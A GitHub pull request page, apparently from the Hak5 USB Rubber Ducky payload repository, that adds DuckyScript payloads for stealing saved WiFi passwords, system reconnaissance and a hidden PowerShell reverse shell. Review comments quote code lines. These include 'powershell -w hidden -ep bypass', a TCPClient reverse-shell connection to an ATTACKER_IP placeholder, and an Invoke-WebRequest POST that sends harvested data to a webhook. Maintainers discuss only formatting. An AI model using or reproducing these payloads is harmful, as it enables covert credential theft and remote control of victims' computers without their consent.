Skip to content

Add NullSec Payload Collection - WiFi Stealer, System Recon, Reverse Shell#572

Open
bad-antics wants to merge 2 commits into
hak5:masterfrom
bad-antics:add-nullsec-payloads
Open

Add NullSec Payload Collection - WiFi Stealer, System Recon, Reverse Shell#572
bad-antics wants to merge 2 commits into
hak5:masterfrom
bad-antics:add-nullsec-payloads

Conversation

@bad-antics

Copy link
Copy Markdown
Contributor

🦆 NullSec Payload Collection

Three new DuckyScript 3.0 payloads for the USB Rubber Ducky.

📁 Payloads Included

Payload Category Description
NullSec-WiFi-Stealer credentials Extract all saved WiFi passwords using netsh
NullSec-System-Recon recon Comprehensive system reconnaissance
NullSec-Reverse-Shell remote_access Pure PowerShell reverse TCP shell

✨ Features

  • DuckyScript 3.0 compliant
  • Proper headers with title, author, version, category, target
  • README documentation for each payload
  • Hidden execution - no visible windows
  • Self-cleaning - removes temp files
  • Windows 10/11 targeted

📋 Payload Details

WiFi Stealer

  • Enumerates all saved WiFi profiles
  • Extracts passwords in cleartext via netsh
  • Optional webhook exfiltration

System Recon

  • OS version, system specs
  • User accounts, domain info
  • Network configuration
  • Running processes
  • Installed software
  • Antivirus status

Reverse Shell

  • Pure PowerShell reverse TCP
  • Interactive shell with PS prompt
  • Configurable attacker IP/port
  • Bypasses execution policy

🔗 Author

Thanks for maintaining this awesome project! 🐬

…hell)

Added 3 DuckyScript 3.0 payloads:

1. NullSec-WiFi-Stealer (credentials/)
   - Extracts all saved WiFi passwords
   - Uses netsh for profile enumeration
   - Hidden execution, self-cleaning

2. NullSec-System-Recon (recon/)
   - Comprehensive system reconnaissance
   - Gathers OS, users, network, processes, software, AV status
   - PowerShell-based, no external tools

3. NullSec-Reverse-Shell (remote_access/)
   - Pure PowerShell reverse TCP shell
   - Interactive PS session
   - Configurable IP/port

All payloads include proper headers, README documentation, and follow Hak5 contribution guidelines.
@ghost

ghost commented Feb 11, 2026

Copy link
Copy Markdown

Yo

DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You can use STRINGLN instead of STRING ENTER it has the same functionality and makes the code cleaner and easier to read

REM Display results (or exfil to your server)
REM Uncomment below to send to webhook:
REM STRING $data = Get-Content $outFile -Raw
REM STRING Invoke-WebRequest -Uri "https://example.com/hook" -Method POST -Body $data

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It is recommended to use a DEFINEat the top of your payload, for user configurable options. for example,

DEFINE #WEBHOOK https://example.com/hook
STRING Invoke-WebRequest -Uri " #WEBHOOK" -Method POST -Body $data

This will inject https://example.com/hook inplace of #WEBHOOK This makes it easier for the end user to configure the payload.

DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You can use STRINGLN instead of STRING ENTER it has the same functionality and makes the code cleaner and easier to read

DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You can use STRINGLN instead of STRING ENTER it has the same functionality and makes the code cleaner and easier to read

DELAY 1500

REM PowerShell reverse shell
STRING $client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",ATTACKER_PORT);

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Your DEFINE wont be injected properly here as there is no # You need to include a # for Defines that are inline.

DEFINE #ATTACKER_IP 192.168.1.100
DEFINE #ATTACKER_PORT 4444

STRING $client = New-Object System.Net.Sockets.TCPClient("#ATTACKER_IP",#ATTACKER_PORT);

@hak5peaks hak5peaks added the pending requested changes requires changes before merge label Feb 23, 2026
- Replace STRING + ENTER with STRINGLN for cleaner code
- Add # prefix to DEFINE variables for proper inline injection
- Add DEFINE #WEBHOOK for user-configurable exfil endpoint
- Add DEFINE #EXFIL_ENABLED toggle for WiFi Stealer
- Bump version to 1.1 on all payloads
@bad-antics

Copy link
Copy Markdown
Contributor Author

Hey @hak5peaks — checking in on this one. I believe all the review feedback from earlier rounds has been addressed in commits on the branch (most recently 2412162 from 2026-02-27):

  • STRINGLN consolidation across all three payloads (no more STRING + ENTER pairs)
  • DEFINE #WEBHOOK / DEFINE #EXFIL_ENABLED at the top of NullSec-WiFi-Stealer, used inline with # prefix
  • DEFINE #ATTACKER_IP / DEFINE #ATTACKER_PORT at the top of NullSec-Reverse-Shell, used inline as ("#ATTACKER_IP",#ATTACKER_PORT) per the docs

Could you take another look when you get a chance? Happy to also add EXTENSION PASSIVE_WINDOWS_DETECT here (same pattern I just landed on #574) for consistency across all the NullSec payloads — just let me know.

1 similar comment
@bad-antics

Copy link
Copy Markdown
Contributor Author

Hey @hak5peaks — checking in on this one. I believe all the review feedback from earlier rounds has been addressed in commits on the branch (most recently 2412162 from 2026-02-27):

  • STRINGLN consolidation across all three payloads (no more STRING + ENTER pairs)
  • DEFINE #WEBHOOK / DEFINE #EXFIL_ENABLED at the top of NullSec-WiFi-Stealer, used inline with # prefix
  • DEFINE #ATTACKER_IP / DEFINE #ATTACKER_PORT at the top of NullSec-Reverse-Shell, used inline as ("#ATTACKER_IP",#ATTACKER_PORT) per the docs

Could you take another look when you get a chance? Happy to also add EXTENSION PASSIVE_WINDOWS_DETECT here (same pattern I just landed on #574) for consistency across all the NullSec payloads — just let me know.

Modify the payload to add your exfil server:
1. Uncomment the webhook lines
2. Replace `example.com/hook` with your server

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Inside of your payload, you have a DEFINE for using webhook. DEFINE #EXFIL_ENABLED FALSE Please include that this is by default set to false and its required to change to TRUE if the user wants to use that feature.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

pending requested changes requires changes before merge

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants